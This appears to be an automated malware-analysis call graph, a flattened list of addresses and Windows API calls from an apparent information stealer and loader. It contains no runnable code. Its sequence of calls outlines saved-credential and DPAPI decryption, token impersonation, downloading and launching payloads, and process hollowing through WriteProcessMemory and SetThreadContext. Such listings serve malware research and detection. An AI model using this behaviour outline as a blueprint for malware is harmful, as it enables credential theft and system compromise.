lstrlenA StrStrIA 9001->9002 9007 10009c30 9001->9007 9003 10009c02 9002->9003 9004 100038e3 2 API calls 9003->9004 9005 10009c10 9004->9005 9006 10001584 lstrlenA 9005->9006 9005->9007 9006->9007 9007->8992 9008->7798 9010 10004849 9009->9010 9012 10004727 9009->9012 9010->7804 9011 10004740 9014 10001d2a 6 API calls 9011->9014 9012->9011 9013 10001e05 6 API calls 9012->9013 9013->9011 9015 1000475a 9014->9015 9016 1000477c 9015->9016 9017 10001db1 5 API calls 9015->9017 9018 10001d2a 6 API calls 9016->9018 9019 10004768 9017->9019 9020 10004792 9018->9020 9021 10004703 16 API calls 9019->9021 9022 100047b4 9020->9022 9025 10001db1 5 API calls 9020->9025 9023 10004772 9021->9023 9024 10001d2a 6 API calls 9022->9024 9026 10001871 LocalFree 9023->9026 9027 100047cb 9024->9027 9028 100047a0 9025->9028 9029 10004777 9026->9029 9030 100047ed 9027->9030 9033 10001db1 5 API calls 9027->9033 9031 10004703 16 API calls 9028->9031 9032 10001871 LocalFree 9029->9032 9034 10001d2a 6 API calls 9030->9034 9035 100047aa 9031->9035 9032->9016 9036 100047d9 9033->9036 9037 10004803 9034->9037 9038 10001871 LocalFree 9035->9038 9041 10004703 16 API calls 9036->9041 9039 10004825 9037->9039 9042 10001db1 5 API calls 9037->9042 9040 100047af 9038->9040 9044 10001db1 5 API calls 9039->9044 9043 10001871 LocalFree 9040->9043 9045 100047e3 9041->9045 9046 10004811 9042->9046 9043->9022 9047 10004832 9044->9047 9048 10001871 LocalFree 9045->9048 9049 10004703 16 API calls 9046->9049 9050 10004703 16 API calls 9047->9050 9051 100047e8 9048->9051 9052 1000481b 9049->9052 9053 1000483c 9050->9053 9054 10001871 LocalFree 9051->9054 9055 10001871 LocalFree 9052->9055 9056 10001871 LocalFree 9053->9056 9054->9030 9057 10004820 9055->9057 9058 10004841 9056->9058 9059 10001871 LocalFree 9057->9059 9060 10001871 LocalFree 9058->9060 9059->9039 9060->9010 9062 10004064 16 API calls 9061->9062 9063 10004716 9062->9063 9063->7839 9065 10001d2a 6 API calls 9064->9065 9066 100050fc 9065->9066 9067 1000515c 9066->9067 9068 10001db1 5 API calls 9066->9068 9067->7871 9069 10005110 9068->9069 9092 100050c3 9069->9092 9072 10001db1 5 API calls 9073 1000512b 9072->9073 9074 100050c3 16 API calls 9073->9074 9075 10005139 9074->9075 9076 10001db1 5 API calls 9075->9076 9077 10005146 9076->9077 9078 100050c3 16 API calls 9077->9078 9079 10005154 9078->9079 9080 10001871 LocalFree 9079->9080 9080->9067 9082 10001e6a 7 API calls 9081->9082 9083 100051b9 9082->9083 9084 10005207 9083->9084 9098 10005160 9083->9098 9084->7903 9093 100050e2 9092->9093 9094 100050cc 9092->9094 9093->9072 9095 10004064 16 API calls 9094->9095 9096 100050da 9095->9096 9097 10001871 LocalFree 9096->9097 9097->9093 9099 10001db1 5 API calls 9098->9099 9100 10005170 9099->9100 9156 1000547e 9111->9156 9114 1000547e 7 API calls 9115 10005643 9114->9115 9116 1000547e 7 API calls 9115->9116 9117 10005671 RegOpenKeyA 9116->9117 9118 10005701 9117->9118 9123 10005687 9117->9123 9118->7911 9119 1000568e RegEnumKeyExA 9120 100056b7 RegCloseKey 9119->9120 9119->9123 9120->9118 9122 10001db1 5 API calls 9122->9123 9123->9119 9123->9122 9124 10001e05 6 API calls 9123->9124 9125 100055de 15 API calls 9123->9125 9126 10001871 LocalFree 9123->9126 9124->9123 9125->9123 9126->9123 9137 100053ea 9136->9137 9138 1000544d 9136->9138 9139 10001db1 5 API calls 9137->9139 9138->7918 9140 100053f7 9139->9140 9141 10004064 16 API calls 9140->9141 9157 10001d2a 6 API calls 9156->9157 9158 10005497 9157->9158 9159 10001d2a 6 API calls 9158->9159 9160 100054ad 9159->9160 9161 10001d2a 6 API calls 9160->9161 9162 100054c3 9161->9162 9163 10001d2a 6 API calls 9162->9163 9164 100054db 9163->9164 9165 10001d2a 6 API calls 9164->9165 9166 100054f1 9165->9166 9167 10001d2a 6 API calls 9166->9167 9169 10005509 9167->9169 9168 10001871 LocalFree 9170 100055b2 9168->9170 9174 10001584 lstrlenA 9169->9174 9190 10005585 9169->9190 9171 10001871 LocalFree 9170->9171 9172 100055ba 9171->9172 9173 10001871 LocalFree 9172->9173 9175 100055c2 9173->9175 9176 10005540 9174->9176 9177 10001871 LocalFree 9175->9177 9178 10001584 lstrlenA 9176->9178 9179 100055ca 9177->9179 9180 1000554b 9178->9180 9181 10001871 LocalFree 9179->9181 9182 10001584 lstrlenA 9180->9182 9183 100055d2 9181->9183 9184 10005556 9182->9184 9185 10001871 LocalFree 9183->9185 9186 10001584 lstrlenA 9184->9186 9188 1000556a 9184->9188 9187 100055da 9185->9187 9186->9188 9187->9114 9189 10001584 lstrlenA 9188->9189 9189->9190 9190->9168 9194 100080b7 9191->9194 9196 1000800d 9191->9196 9192 10007e6c 17 API calls 9193 100080dc 9192->9193 9200 100080e0 9193->9200 9194->9192 9195 1000806f StrStrIW 9195->9196 9196->9194 9196->9195 9213 10007e6c lstrlenW 9196->9213 9198 1000809f CoTaskMemFree 9198->9196 9199 100080ad CoTaskMemFree 9198->9199 9199->9196 9202 100080f0 9200->9202 9201 10008216 9209 1000821b 9201->9209 9202->9201 9203 10008135 CredEnumerateA 9202->9203 9203->9201 9206 10008160 9203->9206 9204 1000820d CredFree 9204->9201 9205 1000817c lstrlenW CryptUnprotectData 9205->9206 9206->9201 9206->9204 9206->9205 9207 100081ef LocalFree 9206->9207 9241 10007bd5 9206->9241 9207->9206 9210 1000822e 9209->9210 9211 1000832b 9209->9211 9210->9211 9245 10007c54 9210->9245 9211->7950 9214 10007e7f 9213->9214 9215 10007e84 9213->9215 9214->9198 9216 10007ee0 wsprintfA 9215->9216 9217 10007eb4 wsprintfA 9215->9217 9219 10001e05 6 API calls 9216->9219 9218 10001e05 6 API calls 9217->9218 9218->9215 9220 10007f07 9219->9220 9221 10001d2a 6 API calls 9220->9221 9222 10007f21 9221->9222 9223 10007f3c 9222->9223 9224 10001d2a 6 API calls 9222->9224 9225 10007fdb 9223->9225 9227 10007f51 lstrlenW 9223->9227 9228 10007fd3 9223->9228 9224->9223 9226 10001871 LocalFree 9225->9226 9229 10007fe3 9226->9229 9227->9228 9230 10007f83 CryptUnprotectData 9227->9230 9231 10001871 LocalFree 9228->9231 9229->9198 9230->9228 9232 10007fa1 9230->9232 9231->9225 9232->9228 9235 10007b9c 9232->9235 9234 10007fcb LocalFree 9234->9228 9239 10001522 9235->9239 9237 10007baa lstrlenW 9238 10007bc3 9237->9238 9238->9234 9240 10001533 9239->9240 9240->9237 9242 10001522 9241->9242 9243 10007be3 lstrlenA 9242->9243 9244 10007bf8 9243->9244 9244->9207 9246 10001522 9245->9246 9247 10007c62 lstrlenW 9246->9247 9248 10001558 9247->9248 9249 10007c7b lstrlenW 9248->9249 9250 10001558 9249->9250 9251 10007c94 lstrlenW 9250->9251 9252 10007cad 9251->9252 9252->9210 9254 10005c7d 9253->9254 9261 10005a43 9253->9261 9254->7954 9255 10005a4a RegEnumKeyExA 9256 10005a73 RegCloseKey 9255->9256 9255->9261 9256->9254 9258 10001db1 5 API calls 9258->9261 9259 10001e05 6 API calls 9259->9261 9260 10001d2a 6 API calls 9260->9261 9261->9255 9261->9258 9261->9259 9261->9260 9262 10001871 LocalFree 9261->9262 9263 10001584 lstrlenA 9261->9263 9262->9261 9263->9261 9309 10001016 CreateStreamOnHGlobal 9343 1000b1de 9350 10001741 GetHGlobalFromStream 9343->9350 9345 1000b1e9 9346 100027d0 18 API calls 9345->9346 9349 1000b1fe 9346->9349 9347 1000b224 9348 10001871 LocalFree 9348->9347 9349->9347 9349->9348 9351 10001782 9350->9351 9352 10001757 9350->9352 9351->9345 9353 1000175f GlobalLock 9352->9353 9353->9351 9354 1000176e 9353->9354 9355 10002452 2 API calls 9354->9355 9356 1000177a GlobalUnlock 9355->9356 9356->9351 6793 1000b362 6803 10003ff3 WSAStartup 6793->6803 6795 1000b369 6796 1000b44d 6795->6796 6797 1000b439 6795->6797 6800 1000b418 Sleep 6795->6800 6802 1000b0dd 6 API calls 6795->6802 6804 10003f8f 6795->6804 6838 10001b79 GetHGlobalFromStream 6795->6838 6797->6796 6813 100026b6 RegCreateKeyA 6797->6813 6800->6795 6802->6795 6803->6795 6805 10003f9e 6804->6805 6808 10003fe4 6804->6808 6806 10003fa4 GetHGlobalFromStream 6805->6806 6805->6808 6807 10003fb4 6806->6807 6806->6808 6809 10003fbc GlobalLock 6807->6809 6808->6795 6809->6808 6810 10003fcb 6809->6810 6848 10003f35 6810->6848 6814 100026da RegSetValueExA 6813->6814 6815 100026fc 6813->6815 6816 100026f3 6814->6816 6817 100026f4 RegCloseKey 6814->6817 6818 10002704 GetTempPathA 6815->6818 6819 100027c9 6815->6819 6816->6817 6817->6815 6818->6819 6820 1000271d 6818->6820 6819->6796 6820->6819 6821 10002728 CreateDirectoryA 6820->6821 6822 10002742 6821->6822 6823 10002762 6822->6823 6824 10002746 6822->6824 6825 10001db1 5 API calls 6823->6825 6950 10001db1 6824->6950 6827 10002771 CreateFileA 6825->6827 6829 10002797 6827->6829 6830 100027af 6827->6830 6828 10002757 6955 10001e05 6828->6955 6963 1000145e 6829->6963 6833 100027b3 DeleteFileA 6830->6833 6834 100027be 6830->6834 6833->6834 6837 10001871 LocalFree 6834->6837 6837->6819 6839 10001c37 6838->6839 6840 10001b99 6838->6840 6839->6795 6840->6839 6841 10001bae GlobalLock 6840->6841 6841->6839 6842 10001bba 6841->6842 6969 10001888 LocalAlloc 6842->6969 6844 10001bc5 6845 10001bd6 GlobalUnlock 6844->6845 6846 10001bef 6845->6846 6847 10001871 LocalFree 6846->6847 6847->6839 6849 10003f44 6848->6849 6856 10003d48 6849->6856 6852 10003d48 27 API calls 6853 10003f7f 6852->6853 6854 10001871 LocalFree 6853->6854 6855 10003f88 GlobalUnlock 6854->6855 6855->6808 6893 10001888 LocalAlloc 6856->6893 6858 10003d5c 6894 10001888 LocalAlloc 6858->6894 6860 10003d69 6895 10001888 LocalAlloc 6860->6895 6862 10003d76 6896 10001888 LocalAlloc 6862->6896 6864 10003d83 InternetCrackUrlA 6865 10003dd1 6864->6865 6883 10003dd7 6864->6883 6866 10003ddc InternetCreateUrlA 6865->6866 6865->6883 6867 10003e01 InternetCrackUrlA 6866->6867 6866->6883 6870 10003e42 6867->6870 6867->6883 6868 10001871 LocalFree 6869 10003f15 6868->6869 6871 10001871 LocalFree 6869->6871 6872 10003e4d ObtainUserAgentString 6870->6872 6870->6883 6873 10003f1d 6871->6873 6874 10003e7d wsprintfA 6872->6874 6875 10003e5f wsprintfA 6872->6875 6876 10001871 LocalFree 6873->6876 6877 10003e9b 6874->6877 6875->6877 6878 10003f25 6876->6878 6897 1000391d socket 6877->6897 6880 10001871 LocalFree 6878->6880 6882 10003f2d 6880->6882 6882->6852 6882->6855 6883->6868 6885 10003ebb lstrlenA 6906 100039a1 6885->6906 6887 10003ecf 6888 10003ed3 6887->6888 6890 10003ee9 6887->6890 6891 100039a1 send 6887->6891 6889 10003f05 closesocket 6888->6889 6889->6883 6890->6888 6890->6889 6911 10003b95 6890->6911 6891->6890 6893->6858 6894->6860 6895->6862 6896->6864 6898 10003936 6897->6898 6900 10003938 6897->6900 6898->6883 6905 10003d1a setsockopt 6898->6905 6899 1000395a 6901 1000397e connect 6899->6901 6902 1000396b 6899->6902 6900->6899 6900->6902 6928 100038e3 inet_addr 6900->6928 6901->6898 6904 10003992 closesocket 6901->6904 6902->6904 6904->6898 6905->6885 6907 100039b7 6906->6907 6908 100039ac 6906->6908 6909 100039bf send 6907->6909 6910 100039dc 6907->6910 6908->6887 6909->6907 6909->6910 6910->6887 6931 10001888 LocalAlloc 6911->6931 6914 10003ba7 6917 10003bef 6914->6917 6927 10003bde 6914->6927 6932 10003a4d 6914->6932 6915 10001871 LocalFree 6916 10003d12 6915->6916 6916->6888 6918 10003c0c StrStrIA 6917->6918 6919 10003c25 lstrlenA StrToIntA 6918->6919 6920 10003c5b StrStrIA 6918->6920 6919->6920 6921 10003c6e lstrlenA 6920->6921 6924 10003ca2 6920->6924 6944 100029f6 lstrlenA 6921->6944 6923 10003c9b 6923->6924 6938 10003abf 6924->6938 6927->6915 6929 100038f3 gethostbyname 6928->6929 6930 100038ff 6928->6930 6929->6930 6930->6899 6931->6914 6947 100039ed select 6932->6947 6934 10003a60 6935 100039ed select 6934->6935 6936 10003a72 6934->6936 6937 10003a74 recv 6934->6937 6935->6934 6936->6914 6937->6934 6937->6936 6939 100039ed select 6938->6939 6941 10003ad5 6939->6941 6940 100039ed select 6940->6941 6941->6940 6942 10003afc recv 6941->6942 6943 10003ae7 6941->6943 6942->6941 6942->6943 6943->6927 6949 10001888 LocalAlloc 6944->6949 6946 10002a08 lstrcpyA 6946->6923 6948 10003a3c 6947->6948 6948->6934 6949->6946 6951 10001dbb lstrlenA lstrlenA 6950->6951 6967 10001888 LocalAlloc 6951->6967 6954 10001dea lstrcpyA lstrcatA 6954->6828 6957 10001e0f lstrlenA lstrlenA 6955->6957 6968 10001888 LocalAlloc 6957->6968 6959 10001e3e lstrcpyA lstrcatA 6960 10001e63 6959->6960 6961 10001e5b 6959->6961 6960->6827 6962 10001871 LocalFree 6961->6962 6962->6960 6964 10001468 WriteFile 6963->6964 6965 1000147e 6964->6965 6966 10001484 CloseHandle 6964->6966 6965->6964 6965->6966 6966->6830 6967->6954 6968->6959 6969->6844 6970 1000b763 OleInitialize 6986 100024eb 6970->6986 6972 1000b76f 7008 10002bdf 6972->7008 6974 1000b77e 6975 1000b782 6974->6975 6976 1000b798 6974->6976 7055 10002cca 6975->7055 7026 10001888 LocalAlloc 6976->7026 6979 1000b78a 6979->6976 6980 1000b7a2 GetUserNameA 6981 1000b7c1 6980->6981 6982 1000b7cc 6980->6982 6984 10001871 LocalFree 6981->6984 7027 10002074 6982->7027 6984->6982 6985 1000b7db 6987 100024f5 6986->6987 7074 10002491 LoadLibraryA 6987->7074 6989 100024fa 6990 10002491 2 API calls 6989->6990 6991 10002509 6990->6991 6992 10002491 2 API calls 6991->6992 6993 10002518 6992->6993 6994 10002491 2 API calls 6993->6994 6995 10002527 6994->6995 6996 10002491 2 API calls 6995->6996 6997 10002536 6996->6997 6998 10002491 2 API calls 6997->6998 6999 10002545 6998->6999 7000 10002491 2 API calls 6999->7000 7001 10002554 7000->7001 7002 10002491 2 API calls 7001->7002 7003 10002563 7002->7003 7004 10002491 2 API calls 7003->7004 7005 10002572 7004->7005 7006 10002491 2 API calls 7005->7006 7007 10002581 7006->7007 7007->6972 7009 10002bf6 7008->7009 7010 10002bf8 7008->7010 7009->6974 7011 10002c14 7010->7011 7012 10002c19 GetCurrentProcess OpenProcessToken 7010->7012 7011->6974 7013 10002cc5 7012->7013 7014 10002c35 GetTokenInformation 7012->7014 7013->6974 7015 10002c53 GetLastError 7014->7015 7016 10002cbd CloseHandle 7014->7016 7015->7016 7017 10002c5d 7015->7017 7016->7013 7017->7016 7080 10001888 LocalAlloc 7017->7080 7019 10002c6b GetTokenInformation 7020 10002cb5 7019->7020 7021 10002c87 ConvertSidToStringSidA 7019->7021 7022 10001871 LocalFree 7020->7022 7021->7020 7023 10002c9b lstrcmpA 7021->7023 7022->7016 7024 10002cac 7023->7024 7025 10002cad LocalFree 7023->7025 7024->7025 7025->7020 7026->6980 7028 10002088 7027->7028 7029 10002093 7027->7029 7030 10001871 LocalFree 7028->7030 7031 10001871 LocalFree 7029->7031 7032 100020b1 7029->7032 7030->7029 7031->7032 7033 100020d3 RegOpenKeyA 7032->7033 7037 10002249 7033->7037 7044 100020ee 7033->7044 7034 100020f8 RegEnumKeyExA 7035 10002241 RegCloseKey 7034->7035 7034->7044 7035->7037 7036 10001db1 5 API calls 7036->7044 7038 10002263 GetHGlobalFromStream 7037->7038 7039 100022c4 GetHGlobalFromStream 7038->7039 7040 10002279 7038->7040 7041 100022da 7039->7041 7047 10002325 7039->7047 7081 10001888 LocalAlloc 7040->7081 7082 10001888 LocalAlloc 7041->7082 7042 10001e05 6 API calls 7042->7044 7044->7034 7044->7036 7044->7042 7051 10001d2a 6 API calls 7044->7051 7052 10002206 lstrlenA 7044->7052 7053 100021cb lstrlenA 7044->7053 7054 10001871 LocalFree 7044->7054 7045 10002295 GlobalLock 7045->7039 7048 100022a9 GlobalUnlock 7045->7048 7047->6985 7048->7039 7049 100022f6 GlobalLock 7049->7047 7050 1000230a GlobalUnlock 7049->7050 7050->7047 7051->7044 7052->7044 7053->7044 7054->7044 7056 10002ce4 7055->7056 7058 10002ce6 7055->7058 7056->6979 7057 10002d0b 7057->6979 7058->7057 7059 10002d12 WTSGetActiveConsoleSessionId CreateToolhelp32Snapshot 7058->7059 7060 10002e67 7059->7060 7061 10002d39 Process32First 7059->7061 7060->6979 7062 10002d51 7061->7062 7063 10002d59 StrStrIA 7062->7063 7064 10002e5c CloseHandle 7062->7064 7066 10002e45 Process32Next 7062->7066 7067 10002da6 OpenProcess 7062->7067 7065 10002d72 ProcessIdToSessionId 7063->7065 7063->7066 7064->7060 7065->7062 7065->7066 7066->7062 7066->7064 7067->7066 7068 10002dc0 OpenProcessToken 7067->7068 7069 10002dd9 ImpersonateLoggedOnUser 7068->7069 7070 10002e3d CloseHandle 7068->7070 7071 10002de6 RegOpenCurrentUser 7069->7071 7072 10002e2b CloseHandle CloseHandle 7069->7072 7070->7066 7073 10002e06 7071->7073 7072->7062 7073->7064 7075 100024a4 7074->7075 7076 100024ab 7074->7076 7075->6989 7077 100024c6 GetProcAddress 7076->7077 7078 100024df 7076->7078 7077->7076 7079 100024d1 7077->7079 7078->6989 7079->6989 7080->7019 7081->7045 7082->7049 9645 100090e3 9646 100090fa 9645->9646 9647 100090f1 9645->9647 9647->9646 9648 10009175 CryptUnprotectData 9647->9648 9648->9646 9649 100091a8 9648->9649 9649->9646 9650 100091cc LocalFree 9649->9650 9650->9646 9651 100091e4 9650->9651 9651->9646 9660 10001888 LocalAlloc 9651->9660 9653 10009200 9654 10009211 lstrlenA StrCmpNIA 9653->9654 9655 10009245 9654->9655 9656 1000922d lstrlenA StrCmpNIA 9654->9656 9657 10009249 lstrlenA StrCmpNIA 9655->9657 9659 10009261 9655->9659 9656->9655 9657->9659 9658 10001871 LocalFree 9658->9646 9659->9658 9660->9653 7083 2442960 7084 244296e 7083->7084 7089 2442b80 7084->7089 7086 244297d 7092 2442500 7086->7092 7106 2442b50 GetPEB 7089->7106 7091 2442baf 7091->7086 7108 2441390 7092->7108 7095 2441390 2 API calls 7096 244252e 7095->7096 7097 2441390 2 API calls 7096->7097 7103 244253e 7097->7103 7098 244261d ExitProcess 7100 24425fd Sleep 7148 24426b0 7100->7148 7103->7098 7103->7100 7113 2441580 7103->7113 7137 2442720 7103->7137 7154 2442630 7103->7154 7107 2442b5b 7106->7107 7107->7091 7109 24413a7 7108->7109 7110 244139c GetProcessHeap 7108->7110 7111 24413c5 7109->7111 7112 24413b0 RtlAllocateHeap 7109->7112 7110->7109 7111->7095 7112->7111 7114 2441596 7113->7114 7119 244159b 7113->7119 7159 2441770 7114->7159 7116 24415af GetVersion 7117 24415ba 7116->7117 7167 2443360 GetComputerNameA 7117->7167 7119->7116 7119->7117 7125 244165d 7128 2441f70 10 API calls 7125->7128 7126 244161f 7188 2441f70 7126->7188 7130 2441675 wsprintfA 7128->7130 7131 2441698 7130->7131 7132 2441390 2 API calls 7131->7132 7136 24416ab 7131->7136 7132->7136 7133 2441744 7133->7103 7136->7133 7194 2442250 7136->7194 7214 2441fe0 7136->7214 7138 2442741 7137->7138 7147 244273a 7137->7147 7139 2442780 7138->7139 7140 24427b2 7138->7140 7141 24427cc 7138->7141 7142 2442798 7138->7142 7138->7147 7287 2441a40 7139->7287 7145 2441960 25 API calls 7140->7145 7305 24419d0 7141->7305 7296 2441960 7142->7296 7145->7147 7147->7103 7152 24426bf 7148->7152 7149 244260d Sleep 7149->7103 7151 2442720 49 API calls 7151->7152 7152->7149 7152->7151 7407 2442830 7152->7407 7411 24429a0 7152->7411 7155 244263d 7154->7155 7156 244269c 7155->7156 7157 2441390 2 API calls 7155->7157 7156->7103 7158 2442663 lstrcpyA 7157->7158 7158->7156 7160 2441390 2 API calls 7159->7160 7161 244179b GetAdaptersAddresses 7160->7161 7166 24417c3 7161->7166 7164 2441837 GetVolumeInformationA 7165 2441868 7164->7165 7165->7119 7218 24413d0 7166->7218 7168 2443395 lstrcatA 7167->7168 7169 24433a6 lstrcatA 7167->7169 7168->7169 7221 2443050 7169->7221 7172 24433d4 lstrcatA 7173 24415c6 7172->7173 7174 2441ed0 7173->7174 7175 2441eff 7174->7175 7176 2441ee9 lstrcpyA 7174->7176 7253 2441ab0 7175->7253 7177 24415d2 7176->7177 7182 2443690 7177->7182 7180 2441f47 lstrcpyA 7180->7177 7181 2441f27 lstrcpyA 7181->7177 7183 24414a0 7182->7183 7184 24436a3 GetModuleHandleA GetProcAddress 7183->7184 7185 24436c6 GetNativeSystemInfo 7184->7185 7186 24436cf GetSystemInfo 7184->7186 7187 2441616 7185->7187 7186->7187 7187->7125 7187->7126 7189 2441f84 7188->7189 7190 2441637 wsprintfA 7188->7190 7191 2441390 2 API calls 7189->7191 7190->7131 7192 2441f8e 7191->7192 7275 2442f20 CryptAcquireContextA 7192->7275 7195 24414a0 7194->7195 7196 2442266 lstrlenA 7195->7196 7197 24422b8 InternetCrackUrlA 7196->7197 7198 24422ab lstrlenA 7196->7198 7199 24422d5 7197->7199 7203 24422ce 7197->7203 7198->7197 7200 2441ea0 InternetOpenA 7199->7200 7199->7203 7203->7136 7215 2441fec 7214->7215 7217 2442004 7214->7217 7216 2441f70 10 API calls 7215->7216 7215->7217 7216->7217 7217->7136 7219 24413dc RtlFreeHeap 7218->7219 7220 24413ef GetWindowsDirectoryA 7218->7220 7219->7220 7220->7164 7220->7165 7228 2443100 7221->7228 7224 244308c 7224->7172 7224->7173 7227 24430c2 lstrcpyA lstrcatA lstrcatA 7227->7224 7246 2441420 7228->7246 7231 244312b 7233 244316c lstrcmpiA 7231->7233 7234 2443080 7231->7234 7248 24431a0 OpenProcess 7231->7248 7233->7231 7233->7234 7234->7224 7235 2443270 OpenProcess 7234->7235 7236 2443297 OpenProcessToken 7235->7236 7237 24430b6 7235->7237 7236->7237 7238 24432b5 GetTokenInformation 7236->7238 7237->7224 7237->7227 7238->7237 7239 24432d4 GetLastError 7238->7239 7239->7237 7240 24432e3 7239->7240 7241 2441390 2 API calls 7240->7241 7242 24432ec GetTokenInformation 7241->7242 7243 2443340 7242->7243 7244 244331b LookupAccountSidA 7242->7244 7245 24413d0 RtlFreeHeap 7243->7245 7244->7243 7245->7237 7247 2441434 EnumProcesses 7246->7247 7247->7231 7247->7234 7249 24431c7 GetProcessImageFileNameA FindCloseChangeNotification 7248->7249 7250 244325b 7248->7250 7249->7250 7251 24431ef 7249->7251 7250->7231 7251->7250 7252 2443246 lstrcpyA 7251->7252 7252->7250 7270 24414a0 7253->7270 7256 2441b1b 7257 2441b14 7256->7257 7272 2441ea0 7256->7272 7257->7180 7257->7181 7260 2441b70 InternetConnectA 7260->7257 7261 2441ba0 HttpOpenRequestA 7260->7261 7262 2441bcd InternetCloseHandle 7261->7262 7263 2441bde 7261->7263 7262->7257 7264 2441be4 InternetQueryOptionA InternetSetOptionA 7263->7264 7265 2441c1c HttpSendRequestA HttpQueryInfoA 7263->7265 7264->7265 7266 2441cc0 InternetCloseHandle InternetCloseHandle 7265->7266 7268 2441c5e 7265->7268 7266->7257 7267 2441c76 InternetReadFile 7267->7268 7269 2441cbc 7267->7269 7268->7266 7268->7267 7268->7269 7269->7266 7271 24414ac InternetCrackUrlA 7270->7271 7271->7256 7271->7257 7273 2441b40 7272->7273 7274 2441eac InternetOpenA 7272->7274 7273->7257 7273->7260 7274->7273 7276 2442f65 CryptCreateHash 7275->7276 7281 2442f5b 7275->7281 7277 2442f84 CryptHashData 7276->7277 7276->7281 7278 2442fa0 CryptDeriveKey 7277->7278 7277->7281 7278->7281 7282 2442fca CryptDecrypt 7278->7282 7279 2442ff6 CryptDestroyHash 7280 2443007 7279->7280 7283 244300d CryptDestroyKey 7280->7283 7284 244301e 7280->7284 7281->7279 7281->7280 7282->7281 7283->7284 7285 2443024 CryptReleaseContext 7284->7285 7286 2443037 7284->7286 7285->7286 7286->7190 7288 2441390 2 API calls 7287->7288 7289 2441a56 7288->7289 7314 2441cf0 7289->7314 7291 2441a7a 7292 2441a93 7291->7292 7324 2443c80 GetTempPathA GetTempFileNameA 7291->7324 7294 24413d0 RtlFreeHeap 7292->7294 7295 2441a9f 7294->7295 7295->7147 7297 2441390 2 API calls 7296->7297 7298 2441976 7297->7298 7299 2441cf0 16 API calls 7298->7299 7300 244199a 7299->7300 7301 24419b9 7300->7301 7349 24439b0 7300->7349 7302 24413d0 RtlFreeHeap 7301->7302 7304 24419c5 7302->7304 7304->7147 7306 2441390 2 API calls 7305->7306 7307 24419e6 7306->7307 7308 2441cf0 16 API calls 7307->7308 7309 2441a0a 7308->7309 7310 2441a23 7309->7310 7372 2442dc0 7309->7372 7312 24413d0 RtlFreeHeap 7310->7312 7313 2441a2f 7312->7313 7313->7147 7315 2441d02 7314->7315 7316 2441ab0 12 API calls 7315->7316 7318 2441dab 7315->7318 7317 2441d29 7316->7317 7317->7318 7321 2441d35 7317->7321 7319 2441ab0 12 API calls 7318->7319 7320 2441d64 7318->7320 7332 24418a0 7318->7332 7319->7318 7320->7291 7321->7320 7322 24418a0 4 API calls 7321->7322 7322->7320 7339 2443c10 7324->7339 7326 2443d0f 7326->7292 7327 2443cca 7327->7326 7328 2443d16 7327->7328 7329 2443ce7 wsprintfA 7327->7329 7344 2443940 7328->7344 7330 2443940 3 API calls 7329->7330 7330->7326 7333 2441390 2 API calls 7332->7333 7334 24418af RtlDecompressBuffer 7333->7334 7337 2441922 7334->7337 7336 24413d0 RtlFreeHeap 7338 244193f 7336->7338 7337->7336 7338->7318 7340 2443c6e 7339->7340 7341 2443c1a 7339->7341 7340->7327 7341->7340 7342 2443c20 CreateFileA 7341->7342 7342->7340 7343 2443c45 WriteFile CloseHandle 7342->7343 7343->7340 7345 24414a0 7344->7345 7346 244395a CreateProcessA 7345->7346 7347 2443985 CloseHandle CloseHandle 7346->7347 7348 2443981 7346->7348 7347->7348 7348->7326 7350 24439bf 7349->7350 7351 24439c6 7350->7351 7357 24433f0 7350->7357 7351->7301 7356 2443a07 CreateThread CloseHandle 7356->7351 7358 2443422 VirtualAlloc 7357->7358 7359 2443440 VirtualAlloc 7358->7359 7363 244345c 7358->7363 7359->7363 7360 2443462 7361 24434e0 7360->7361 7362 24434cd VirtualFree 7360->7362 7361->7351 7364 2443800 7361->7364 7362->7361 7363->7358 7363->7360 7371 244383b 7364->7371 7365 2443881 7365->7351 7365->7356 7366 2443848 GetModuleHandleA 7367 244386e LoadLibraryA 7366->7367 7366->7371 7367->7371 7368 24438b5 7369 24438d3 GetProcAddress 7368->7369 7370 24438ee GetProcAddress 7368->7370 7369->7371 7370->7371 7371->7365 7371->7366 7371->7368 7373 2442dd6 7372->7373 7374 2442ddd 7373->7374 7385 2442e90 7373->7385 7374->7310 7378 2442e61 7381 2442e67 TerminateProcess 7378->7381 7382 2442e73 CloseHandle CloseHandle 7378->7382 7381->7382 7382->7374 7384 2442e54 GetProcessId 7384->7378 7386 24414a0 7385->7386 7387 2442ea6 GetEnvironmentVariableA lstrcatA CreateProcessA 7386->7387 7388 2442df1 7387->7388 7388->7374 7389 24434f0 7388->7389 7390 2443529 VirtualAllocEx 7389->7390 7391 244354b VirtualAllocEx 7390->7391 7398 244356b 7390->7398 7391->7398 7392 2443571 7394 2443617 7392->7394 7395 24413d0 RtlFreeHeap 7392->7395 7393 2441390 2 API calls 7393->7398 7396 2442e20 7394->7396 7397 2443626 VirtualFreeEx 7394->7397 7395->7394 7396->7378 7400 2443a60 7396->7400 7397->7396 7398->7390 7398->7392 7398->7393 7399 24435db WriteProcessMemory 7398->7399 7399->7392 7399->7398 7401 24414a0 7400->7401 7402 2443a86 GetThreadContext 7401->7402 7403 2443aa2 WriteProcessMemory 7402->7403 7404 2442e48 7402->7404 7403->7404 7405 2443ac6 SetThreadContext 7403->7405 7404->7378 7404->7384 7405->7404 7406 2443ae8 ResumeThread 7405->7406 7406->7404 7408 2442863 7407->7408 7410 2442840 7407->7410 7409 24413d0 RtlFreeHeap 7408->7409 7408->7410 7409->7410 7410->7152 7412 24429b0 7411->7412 7414 24429c0 7411->7414 7413 24413d0 RtlFreeHeap 7412->7413 7413->7414 7414->7152 9264 1000af31 CreateToolhelp32Snapshot 9265 1000afc1 9264->9265 9266 1000af49 Process32First 9264->9266 9273 1000afeb CreateMutexA CreateProcessA 9265->9273 9267 1000af61 9266->9267 9268 1000af65 StrStrIA 9267->9268 9269 1000afb6 CloseHandle 9267->9269 9270 1000afa2 Process32Next 9268->9270 9271 1000af7a OpenProcess 9268->9271 9269->9265 9270->9267 9271->9270 9272 1000af8d TerminateProcess CloseHandle 9271->9272 9272->9270 9548 100095b3 9549 100095bf 9548->9549 9551 100095c3 9548->9551 9550 10009774 9551->9550 9576 10001888 LocalAlloc 9551->9576 9553 10009656 9554 100096d0 9553->9554 9555 1000967e lstrlenA StrCmpNIA 9553->9555 9558 100096d9 lstrlenA StrCmpNIA 9554->9558 9560 100096ce 9554->9560 9556 100096b2 9555->9556 9557 1000969a lstrlenA StrCmpNIA 9555->9557 9559 100096b6 lstrlenA StrCmpNIA 9556->9559 9556->9560 9557->9556 9558->9560 9559->9560 9561 1000975c 9560->9561 9562 10009713 9560->9562 9564 10006bec 